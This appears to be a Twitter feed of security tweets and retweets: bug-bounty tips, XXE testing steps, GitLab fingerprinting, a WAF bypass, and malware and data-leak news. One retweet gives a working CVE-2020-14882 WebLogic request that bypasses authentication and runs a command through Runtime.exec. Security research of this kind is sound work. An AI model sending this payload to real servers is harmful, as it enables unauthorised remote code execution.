Joined January 2010
tiara  retweeted
10 Oct 2022
Can you spot the vulnerability? 🔎 Show us how you'd create an admin account in the comments 👇 The best explanation gets a 25€ SWAG voucher! 👕
11 Oct 2022
change username to @ReconOne_
12 Sep 2022
tiara  retweeted
Back in 2020 we succeeded in pressuring @IndiHome to shut down their tracker, which had been used all this time to steal customers' browsing history. Now those 26 million stolen browsing history records have leaked and are being shared for free. Turns out they come along with names and NIK 🙂
tiara  retweeted
20 Aug 2022
Hunting CSRF: An attacker’s perspective:✅ 👇 💣 #bugbountytips #infosec
tiara  retweeted
[4/n] 2. Convert the content-type to XML using the "Content-Type Converter" Burp Extension. 3. Process the Request and if the request is processed successfully, it means that the XML parsing is supported. 4. Now, attempt to exploit XXE Interesting Read: netspi.com/blog/technical/we…
26 Nov 2021
It depends on the person, as something difficult for me can be easy for someone else and vice versa
tiara  retweeted
Just published a write-up on Account Takeover due to OAuth Misconfiguration, CSRF, XSS and Weak CSP. blog.dixitaditya.com/2021/11… #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips

tiara  retweeted
8 Nov 2021
Query the GitLab version number through the CSS file name and build a database index. Example: gitlab/gitlab-ce:13.9.5-ce.0 application-d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb.css fofa.so/result?qbase64=Ym9ke… censys.io/blog/cve-2021-2220…

tiara  retweeted
28 Oct 2020
#CVE-2020–14882 Weblogic Unauthorized bypass RCE http://x.x.x.x:7001/console/images/../console.portal POST: _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2….ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');") testbnull.medium.com/weblogi…
tiara  retweeted
Pretty interesting writeup on bypassing ModSecurity WAF for SQLi. 🌟"When MySQL sees 1.e(abc), it will ignore the 1.e( portion because the following characters do not form a valid numeric value."🌟 blog.h3xstream.com/2021/10/b… #bugbountytips #bugbounty #infosec #cybersecurity
17 Nov 2021
Hi community! Today from "The Bug Bounty Hunter", we would like to talk about netlas.io. It is a new search engine to discover, research and monitor any asset. It is so useful for your #bugbounty recon automation. medium.com/@thebugbountyhunt…

17 Nov 2021
TensorFlow Python Code Injection: More eval() Woes jfrog.com/blog/tensorflow-py…

15 Nov 2021
I've earned the Pentesting Principles Badge on TryHackMe for Completing the 'Introduction to Pentesting' module tryhackme.com/Enoleriand/bad… #tryhackme via @tryhackme

14 Nov 2021
Millions of Routers, IoT Devices at Risk from New Open-Source Malware. BotenaGo, written in Google’s Golang programming language, can exploit more than 30 different vulnerabilities.
14 Nov 2021
Newly surfaced malware that is difficult to detect and written in Google’s open-source programming language has the potential to exploit millions of routers and IoT devices, researchers have found.
14 Nov 2021
Discovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a blog post published Thursday. threatpost.com/routers-iot-o…